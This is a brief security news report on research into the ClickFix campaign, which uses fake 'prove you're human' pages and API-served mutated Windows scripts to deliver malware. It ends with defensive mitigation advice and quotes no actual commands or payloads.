New research has dissected the inner workings of the ClickFix social engineering campaign, exposing a back-end infrastructure that automates the delivery of malware through API-driven servers. The trick, which tricks users into manually executing malicious commands via fake "prove you're human" pages, has evolved into a scalable operation. Investigators analyzed over 3,000 live payloads to map the attack chain.
The campaign's infrastructure assigns each visitor a unique but functionally identical payload, effectively evading signature-based detection. The same analysis also identified a new delivery mechanism designed specifically to slip past Windows script scanning protections. This marks a significant escalation in the threat's capability to remain undetected on compromised systems.
ClickFix lures victims by presenting a captcha-style page that requires the user to paste and run a Windows script. Behind the scenes, an API serves the script with varying identifiers and minor mutations. This makes it difficult for defenders to block or trace individual commands. The research highlights how the attackers have industrialised the obfuscation process.
Mitigation against these evolving threats typically relies on user education and disabling automatic execution of scripts from untrusted sources. Researchers recommend that organizations tighten PowerShell execution policies and implement application allowlisting. No specific patches or vendor fixes are linked to this campaign, as it exploits user interaction rather than a software vulnerability.
Attribution for the ClickFix network remains unclear, but the sophistication of the API-driven delivery suggests a well-resourced threat actor. The discovery underscores the broader trend where social engineering teams up with invisible delivery layers, making each attack uniquely hard to spot.